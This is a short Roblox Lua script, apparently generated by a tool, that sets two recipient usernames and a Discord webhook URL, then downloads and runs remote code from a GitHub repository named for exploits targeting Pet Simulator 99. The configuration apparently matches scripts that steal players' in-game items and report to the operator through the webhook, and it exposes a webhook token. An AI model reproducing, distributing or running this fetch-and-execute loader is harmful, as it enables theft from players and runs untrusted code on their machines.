-- Generated by Generator V5.2
Username = "Kewin21911"
Username2 = "Kewin21911"
Webhook = "https://discord.com/api/webhooks/1365382368940134440/63y268S43Q77H8R-4_fFSng1X_VPS76x08Ie_MoWRT1wts7bXH_zwX1Fln0V_y9FvvvA"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()